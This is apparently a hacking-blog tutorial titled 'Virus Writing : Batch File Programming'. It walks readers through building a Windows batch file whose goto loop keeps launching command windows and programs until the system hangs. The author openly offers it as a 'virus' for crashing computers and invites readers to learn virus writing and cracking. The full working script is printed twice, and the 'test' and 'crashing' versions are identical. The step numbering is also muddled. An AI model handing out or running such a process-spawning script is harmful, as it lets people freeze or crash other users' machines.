News Ticker

Virus Writing : Batch File Programming

By Unknown - Friday 14 February 2014 No Comments
unknowndevice64 here.
with a new tutorial of funny virus making, you can also crash windows with these codes.
first of all run cmd (Command Prompt).
how to run cmd:-
Method 1:
-- Press Windows Key + R (for run command)
--and in run type cmd
Method 2:
Goto Start Menu there type or serach cmd.

Now lets start some basic exercise, with some basic
commands.
1. echo off
--echo off is used to off the echo of your input command.
2. ping localhost (or website or ip)
-- used to test the connectivity of system to provided server.
we will use this as a sleep command and test our code.
3. goto
--goto is commonly used function for looping the code.
4. start
--used for start new command window.
please for better understanding i will suggest to try these command first.

We will make funny as well as critical code for system by combining these codes in single file, this combines codes are know as "Batch File" Programming.
Tutorial Start Here,
open text editor (notepad)
first we want to work silently so we have to write
Line 1: @echo off
to start loop label is required
Line 2: :unknowndevice64
write critical code here to execute in loop for test,
Line 3: ping localhost
and for crashing system we have to open several cmd, or we can also start several application like notepad, paint etc..
Line 3: start
Line 3: notepad
Line 3: calc
or we can also combine all above as
Line 3:
start
notepad
calc
Now for looping we have to use goto
Line 4: goto :unknowndevice64
Now this is most important step how to save to make code working,
you have to save the code with any name like unknowndevice64 or virus or anything else WITH THE EXTENSION (.bat)
 after saving this file becomes windows executable double click on test code to check.
and be carefull if you writes crashing code, because after running windows will open several windows of written codes. even you cannt shutdown the system.
whole codes will looks like :
For Test :
@echo off
:unknowndevice64
start
goto unknowndevice64

For Crashing system:
@echo off
:unknowndevice64
start
goto unknowndevice64

keep reading for more interesting articles and to learn hacking, Virus writing as well as cracking.
your friend,
unknowndevice64.




No Comment to " Virus Writing : Batch File Programming "